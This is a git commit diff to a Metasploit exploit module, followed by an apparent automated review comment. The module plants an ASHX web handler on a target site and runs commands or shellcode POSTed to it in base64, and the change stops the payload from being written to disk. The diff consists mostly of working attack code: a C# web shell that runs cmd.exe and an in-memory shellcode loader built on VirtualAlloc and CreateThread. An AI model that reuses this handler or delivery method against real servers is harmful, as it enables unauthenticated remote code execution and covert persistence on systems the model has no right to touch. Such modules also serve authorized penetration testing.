POST the payload.encoded data when we trigger the ASHX file; this way we don't drop the Metasploit payload to disk.
This commit is contained in:
parent
f6b1c9b1ce
commit
eded0e7788
|
@ -207,7 +207,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
if target['Arch'] == ARCH_CMD
|
||||
|
||||
payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
|
||||
using System;
|
||||
using System.Web;
|
||||
|
@ -215,13 +214,21 @@ using System.Diagnostics;
|
|||
|
||||
public class #{vars[:var_handler_class]} : IHttpHandler
|
||||
{
|
||||
public void ProcessRequest(HttpContext ctx)
|
||||
public void ProcessRequest(HttpContext #{vars[:var_ctx]})
|
||||
{
|
||||
if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
|
||||
return;
|
||||
}
|
||||
|
||||
byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
|
||||
|
||||
string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});
|
||||
|
||||
ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();
|
||||
|
||||
#{vars[:var_psi]}.FileName = "cmd.exe";
|
||||
|
||||
#{vars[:var_psi]}.Arguments = "/c #{payload.encoded.gsub('\\', '\\\\\\\\')}";
|
||||
#{vars[:var_psi]}.Arguments = "/c " + #{vars[:var_payload]};
|
||||
|
||||
#{vars[:var_psi]}.RedirectStandardOutput = true;
|
||||
|
||||
|
@ -233,8 +240,6 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
public bool IsReusable { get { return true; } }
|
||||
})
|
||||
else
|
||||
var_payload = Rex::Text.numhexify(payload.encoded, Rex::Text::DefaultWrap, '', '', '', '', ',')
|
||||
|
||||
payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>
|
||||
using System;
|
||||
using System.Web;
|
||||
|
@ -249,9 +254,13 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
[System.Runtime.InteropServices.DllImport("kernel32")]
|
||||
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);
|
||||
|
||||
public void ProcessRequest(HttpContext ctx)
|
||||
public void ProcessRequest(HttpContext #{vars[:var_ctx]})
|
||||
{
|
||||
byte[] #{vars[:var_bytearray]} = { #{var_payload} };
|
||||
if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {
|
||||
return;
|
||||
}
|
||||
|
||||
byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);
|
||||
|
||||
IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);
|
||||
|
||||
|
@ -305,12 +314,20 @@ public class #{vars[:var_handler_class]} : IHttpHandler
|
|||
#
|
||||
# 7. Trigger the payload by requesting the extensions .ashx file.
|
||||
#
|
||||
res = send_request_cgi(
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
|
||||
'keep_cookies' => true
|
||||
)
|
||||
if target['Arch'] == ARCH_CMD
|
||||
payload_data = payload.encoded.gsub('\\', '\\\\\\\\')
|
||||
else
|
||||
payload_data = payload.encoded
|
||||
end
|
||||
|
||||
res = send_request_cgi(
|
||||
'method' => 'POST',
|
||||
'uri' => normalize_uri(target_uri.path, 'App_Extensions', plugin_guid, payload_ashx),
|
||||
'keep_cookies' => true,
|
||||
'vars_post' => {
|
||||
vars[:var_payload_key] => Base64.strict_encode64(payload_data)
|
||||
}
|
||||
)
|
||||
unless res&.code == 200
|
||||
fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')
|
||||
end
|
||||
|
|
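Review bot: The backslash doubling kept at `payload_data = payload.encoded.gsub('\\', '\\\\\\\\')` in the ARCH_CMD branch looks like a leftover from when the command was interpolated into a C# string literal; now that the command travels base64-encoded in the POST body and is recovered with `Convert.FromBase64String` plus `Encoding.UTF8.GetString`, nothing undoes the doubling, so cmd.exe would receive `\\` wherever the payload contained `\`. Unless another escaping layer I cannot see is in play, both branches should send the command unchanged, i.e. `payload_data = payload.encoded`. The step comment `# 7. Trigger the payload by requesting the extensions .ashx file.` still describes the old GET; `# 7. Trigger the payload by POSTing the base64-encoded payload to the extension's .ashx file.` would match the new code. Note also that the handler left on the server executes any base64 body posted under the randomized key with no further authentication, so the module should make sure the .ashx is removed once the session is up (no cleanup step is visible in this section). The enclosing exploit method starts outside the hunk.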